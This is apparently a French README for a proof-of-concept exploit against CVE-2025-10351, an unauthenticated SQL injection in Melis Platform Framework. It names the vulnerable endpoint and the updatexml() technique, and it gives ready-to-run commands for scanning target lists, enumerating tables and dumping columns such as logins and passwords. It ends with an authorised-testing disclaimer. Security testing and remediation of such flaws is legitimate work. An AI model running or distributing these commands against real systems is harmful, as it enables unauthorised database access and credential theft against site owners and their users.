
Exploit pour CVE-2025-10351. Injection SQL sur Melis Platform Framework
POC pour CVE-2025-10351 : Une vulnérabilité d'injection SQL non authentifiée affectant un point de terminaison spécifique dans Melis Platform Framework.
Ce POC cible une vulnérabilité d'injection SQL basée sur les erreurs non authentifiée sur le point de terminaison :
melis/MelisCms/PageEdition/getTinyTemplates?idPage=
Il utilise updatexml() dans MySQL pour extraire :
Il détecte également les vecteurs d'injection SQL temporelle possibles pour une exploitation manuelle ultérieure.
Installez les dépendances avec :
pip3 install -r requirements.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80
python3 CVE-2025-10351-POC.py -l targets.txt
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password
python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug
| Argument | Description |
|---|---|
-u | URL cible |
-p | Port (80, 443, etc.) |
-l | Fichier contenant une liste d'URL |
-s | Temps d'attente pour les tests temporels (par défaut : 1s) |
-at | Extraire tous les noms de tables |
-t | Spécifier le nom de la table |
-ac | Extraire toutes les colonnes d'une table donnée |
-c | Liste de colonnes séparées par des virgules à extraire |
--proxy | Burp Proxy http://127.0.0.1:8080 |
--insecure | Désactiver les vérifications TLS lors de l'utilisation de connexions proxy |
--cookie | Cookies pour les requêtes d'authentification |
--debug | Mode débogage |
tables_extracted.txt<table_name>_data.txtCe document est destiné uniquement aux tests de sécurité autorisés et à la remédiation. N'utilisez pas le PoC ou les étapes de reproduction contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test. L'auteur n'est pas responsable d'une mauvaise utilisation.
Fait avec ❤️ par Manuel Iván San Martín Castillo